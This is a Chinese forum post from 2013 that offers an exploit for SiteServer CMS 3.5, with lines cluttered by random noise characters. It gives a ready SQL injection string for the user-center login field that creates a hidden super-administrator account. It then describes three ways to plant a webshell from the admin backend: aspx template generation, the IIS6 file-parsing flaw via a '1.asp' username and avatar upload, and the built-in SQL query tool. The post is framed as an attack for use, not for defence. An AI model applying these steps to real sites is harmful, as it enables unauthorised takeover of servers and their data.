经测试秒杀最新的3.5版, L$ {0 w7 e; \: {$ w) N; v
stieserver官网:www.siteserver.cn
5 Q5 G6 F7 _# O( z* \% f/ \: VEXP:
: U9 a. i1 A( w {7 z# I6 t7 x2 w直接访问UserCenter/login.aspx/ U9 E% |0 X! \: E
用户名处输入:
( _$ G5 L% H" q Q5 t/ P9 y) |
2 N0 d* J. h6 t5 ?5 R123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–1 T3 t' v: ?! E$ H
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
% N* j9 X7 W& a0 `之后再访问后台SiteServer/login.aspx用插入的用户登陆; Y! l6 j$ j/ W' N) X
后台拿webshell的三种方法:
# c* f4 x8 j0 d0 p6 N一、 d8 Y5 ~7 _; L( d" ?
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
2 @/ g$ m& c: J$ c4 s+ K' n5 o, s8 F' W二、+ d" m% l$ [( U B& c$ i {* \4 u" F
成员权限-》添加用户-》用户名为:1.asp+ K2 ?: l) E5 E$ u5 z7 A: [
http://127.0.0.1/usercenter/
0 p2 z8 [9 L) u" P9 W用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell0 Q5 _+ ~5 G6 f; F7 Q
(ps:后台添加用户时不会验证是否含有非法字符)! w+ {* |4 N7 U+ n
三、 G0 D9 {: c2 _; l1 }- l8 o6 Z( k
系统工具-》实用工具-》机器参数查看
- _# W2 L3 }$ o1 b) l, E$ |& W可以看到数据库类型、名称,WEB路径( O+ Z# B: w8 S3 A. |" K! a$ c; c
系统工具-》数据库工具-》SQL语句查询" [6 ~- Y2 H% m4 X7 F
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对